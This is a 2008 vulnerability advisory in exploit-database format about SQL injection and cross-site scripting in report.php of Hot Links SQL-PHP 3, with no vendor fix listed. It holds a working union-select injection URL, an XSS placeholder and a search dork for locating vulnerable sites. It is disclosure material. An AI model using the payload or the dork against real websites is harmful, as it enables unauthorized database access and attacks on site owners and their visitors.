[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities
# Published : 2008-09-09
# Author : sl4xUz
# Previous Title : Stash 1.0.3 Multiple SQL Injection Vulnerabilities
# Next Title : Live TV Script (index.php mid) SQL Injection Vulnerability
###########################################################
#
# ___ __ __ __ __
# /_ / \ / /
# ____// \ __ _ __ _ ____
# /',__ \ _ / /'\ /'\ /_ ,`
# /__, ` _ _ __ ,__\> <\> <\ _ /_/ /_
# /____/ /____\/_/__//_/_\_/_ _____/____
# /___/ /____/ /_/ ///_////_/ /_____//____/
#
# security breakd0wn!
###########################################################
#
# Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities
# Vendor: http://www.mrcgiguy.com
# Vulnerable Version: 3 and prior versions
# Fix: N/A
#
###########################################################
#
# c0ntact: sl4x.xuz[at]gmail[dot]com
# d0rk: "Powered By: Hot Links SQL-PHP 3"
# stop lammo
#
###########################################################
######################
1. Information
######################
Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free.
######################
2. Vulnerabilities
######################
SQL Injection in "report.php" in the "id" parameter.
Cross Site Scripting in "report.php" in the "id" parameter.
######################
3. PoC
######################
http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3--
http://localhost/path/report.php?id=[XSS]
###########################################################
# www.Syue.com [2008-09-09]